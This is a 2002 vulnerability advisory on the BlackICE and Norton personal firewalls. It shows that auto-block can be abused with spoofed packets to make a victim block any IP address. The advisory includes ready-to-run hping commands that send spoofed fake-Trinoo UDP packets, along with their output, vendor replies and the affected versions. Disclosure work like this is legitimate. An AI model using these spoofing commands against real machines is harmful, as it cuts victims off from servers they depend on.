Overview In a default installation, some personal firewall software will work with auto-block function on, and this time if you fake a high level dangerous attack packet with spoof address target these pc, these firewall will immediately block the spoofed ip address without any further judgement. Thus, an intruders might quickly block quite a great internet address for a victim pc remotely. Example I’ve test this on BlackICE and Norton personal firewall Below are the steps and result of the test on BlackICE, step 1:A clean and DEFAULT installation of blackice defender for server(version 2.9.cap) on a win2k server pc,which ip address is ip.add.of.victim step 2:On a linux box with hping (a free soft can get from www.hping.org) installed,perform the following three commands: --- [root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a ip.add. of.dnsserver HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers + 4 data bytes --- ip.add.of.victim hping statistic --- 5 packets tramitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms [root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a www.google.com HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers + 4 data bytes --- ip.add.of.victim hping statistic --- 5 packets tramitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms [root@]# hping -p 31335 -e PONG -2 ip.add.of.victim -c 5 -d 4 -a www.networkice.com HPING ip.add.of.victim (eth0 ip.add.of.victim): udp mode set, 28 headers + 4 data bytes --- ip.add.of.victim hping statistic --- 5 packets tramitted, 0 packets received, 100% packet loss round-trip min/avg/max = 0.0/0.0/0.0 ms --- These three commands all do the same thing:send fake trinoo communication udp packet to our target machine ip.add.of.victim with spoofed ip adress. ( google,networkeice,and ip.add.of.dnsserver-our dns server) result:Each time the command executed,the blackice icon on the windows system tray flash,and an entries added in blackice 's Advanced Frirewall Settings automatically whick block all the packet of the spoofed address.And the spoofed ip address is unreachable immediately. The test steps and result of Norton personal firewall are almost the same, using hping -e 13 -d 2 -s 6000 -p 2140 -2 ip.of.remote.victimpc -c 2 -a ip.of.spoofed.address instead. Vendor Response I’ve contacted symsecurity@symantec.com and NSupport@iss.net on Sep 24, 2002, Symantec told me they have forwarded my concerns on to the appropriate team, and BlackIce reply me As the product exists now, there is nothing that can be done to correct this. And they are in the hopes that something can be done in a future release. Affected Versions: -- I have test the following product BlackICE Defender for server version 2.9.cap BlackICE Server Protection version 3.5.cdf Norton personal firewall 2002 (version 4.0) All are vulnerable. -- 我要更好的生活 Yiming Gong Senior System Administrator China Netcom yiming@security.zz.ha.cn http://security.zz.ha.cn 0086-371-7934907
